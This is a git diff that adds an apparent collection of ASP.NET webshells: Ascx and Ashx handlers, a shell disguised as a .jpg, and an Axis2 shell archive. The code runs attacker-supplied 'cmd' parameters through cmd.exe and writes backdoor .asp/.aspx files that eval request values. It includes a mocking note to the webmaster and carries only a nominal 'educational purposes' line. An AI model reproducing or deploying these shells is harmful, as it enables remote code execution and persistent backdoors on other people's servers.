xl7dev
diff --git a/‎Aar/Axis2Shell-master.zip
7.85 KB b/‎Aar/Axis2Shell-master.zip
7.85 KB
diff --git a/‎Ascx/shell.ascx
+17 b/‎Ascx/shell.ascx
+17
diff --git a/‎Ashx/Hypn.ashx
+42 b/‎Ashx/Hypn.ashx
+42
diff --git a/‎Ashx/include.ashx
+19 b/‎Ashx/include.ashx
+19
diff --git a/‎Ashx/shell.jpg
+42 b/‎Ashx/shell.jpg
+42
diff --git a/‎Ashx/write_asp_file.ashx
+19 b/‎Ashx/write_asp_file.ashx
+19
diff --git a/‎Ashx/write_aspx_file.ashx
+19 b/‎Ashx/write_aspx_file.ashx
+19
diff --git a/‎Ashx/xx.ashx
+19 b/‎Ashx/xx.ashx
+19
@@ -0,0 +1,17 @@
+<script runat="server">
+
+public void WriteShell(object sender,EventArgs e)
+
+{
+
+    System.IO.File.WriteAllText(HttpContext.Current.Request.PhysicalPath+".aspx","test by wooyun");
+
+}
+
+</script>
+
+<form runat="server">
+
+<asp:Button ID="Write" runat="server" Text="Write" OnClick="WriteShell"/>
+
+</form>
@@ -0,0 +1,42 @@
+<% @ webhandler language="C#" class="AverageHandler" %>
+
+using System;
+using System.Web;
+using System.Diagnostics;
+using System.IO;
+
+public class AverageHandler : IHttpHandler
+{
+  /* .Net requires this to be implemented */
+  public bool IsReusable
+  {
+    get { return true; }
+  }
+
+  /* main executing code */
+  public void ProcessRequest(HttpContext ctx)
+  {
+    Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" +   HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
+    string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
+
+    ctx.Response.Write("<form method='GET'>Command: <input name='cmd' value='"+command+"'><input type='submit' value='Run'></form>");
+    ctx.Response.Write("<hr>");
+    ctx.Response.Write("<pre>");
+
+    /* command execution and output retrieval */
+    ProcessStartInfo psi = new ProcessStartInfo();
+    psi.FileName = "cmd.exe";
+    psi.Arguments = "/c "+command;
+    psi.RedirectStandardOutput = true;
+    psi.UseShellExecute = false;
+    Process p = Process.Start(psi);
+    StreamReader stmrdr = p.StandardOutput;
+    string s = stmrdr.ReadToEnd();
+    stmrdr.Close();
+
+    ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
+    ctx.Response.Write("</pre>");
+    ctx.Response.Write("<hr>");
+    ctx.Response.Write("By <a href='http://www.twitter.com/Hypn'>@Hypn</a>, for educational purposes only.");
+ }
+}
@@ -0,0 +1,19 @@
+<%@ WebHandler Language="C#" class="Handler" %>
+using System;
+using System.Web;
+using System.IO;
+public class Handler : IHttpHandler {
+
+    public void ProcessRequest (HttpContext context) {
+        context.Response.ContentType = "text/plain";
+        StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx"));
+        file1.Write("<!--#include file=\"query.aspx\" -->");
+        file1.Flush();
+        file1.Close();
+    }
+    public bool IsReusable {
+        get {
+            return false;
+        }
+    }
+}
@@ -0,0 +1,19 @@
+<%@ WebHandler Language="C#" class="Handler" %>
+using System;
+using System.Web;
+using System.IO;
+public class Handler : IHttpHandler {
+
+    public void ProcessRequest (HttpContext context) {
+        context.Response.ContentType = "text/plain";
+        StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
+        file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
+        file1.Flush();
+        file1.Close();
+    }
+    public bool IsReusable {
+        get {
+            return false;
+        }
+    }
+}
@@ -0,0 +1,19 @@
+<%@ WebHandler Language="C#" Class="Handler" %> 
+using System; 
+using System.Web; 
+using System.IO; 
+public class Handler : IHttpHandler { 
+    public void ProcessRequest (HttpContext context) { 
+        context.Response.ContentType = "text/plain";
+        string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"keio\"]"+",\"unsafe\");%>Hey web master,Have a nice day o.O? I hope so! HaHa"; 
+        StreamWriter file1= File.CreateText(context.Server.MapPath("query.aspx")); 
+        file1.Write(show); 
+        file1.Flush(); 
+        file1.Close();          
+    }
+    public bool IsReusable { 
+        get { 
+            return false; 
+        } 
+    } 
+}
@@ -0,0 +1,19 @@
+<%@ WebHandler Language="C#" Class="Handler" %> 
+using System; 
+using System.Web; 
+using System.IO; 
+public class Handler : IHttpHandler { 
+    public void ProcessRequest (HttpContext context) { 
+        context.Response.ContentType = "text/plain";
+string show="<% @Page Language=\"Jscript\"%"+"><%Response.Write(eval(Request.Item"+"[\"xiaoma\"]"+",\"unsafe\"));%>Hey web master,Have a nice day o.O? I hope so! HaHa";
+        StreamWriter file1= File.CreateText(context.Server.MapPath("query.aspx")); 
+        file1.Write(show); 
+        file1.Flush(); 
+        file1.Close();          
+    }
+    public bool IsReusable { 
+        get { 
+            return false; 
+        } 
+    } 
+}